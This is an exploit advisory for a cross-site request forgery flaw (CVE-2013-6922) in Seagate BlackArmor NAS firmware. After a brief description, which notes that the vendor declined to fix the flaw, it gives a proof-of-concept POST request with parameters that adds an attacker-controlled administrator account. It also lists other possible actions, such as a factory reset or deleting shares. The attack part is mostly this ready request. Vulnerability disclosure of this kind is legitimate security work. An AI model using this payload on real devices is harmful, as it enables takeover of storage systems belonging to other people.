# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery# Google Dork: N/A# Date: 04-01-2014# Exploit Author: Jeroen - IT Nerdbox# Vendor Homepage: http://www.seagate.com/# Software Link:
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/# Version: sg2000-2000.1331# Tested on: N/A# CVE : CVE-2013-6922### Description:## There are multiple CSRF attacks possible, the proof of concept shows how
it is possible to add
# a user with administrative privileges to the system.## It is also possible to:# # 1. Factory reset the device# 2. Reboot the device# 3. Add/Edit/Remove users# 4. Add/Edit/Remove shares and volumes## This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed.### Proof of Concept:# # POST: http(s)://<url |
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23# Parameters:## username attacker# adminright yes# fullname hacker# userpasswd attackers_password# userpasswdcheck attackers_password
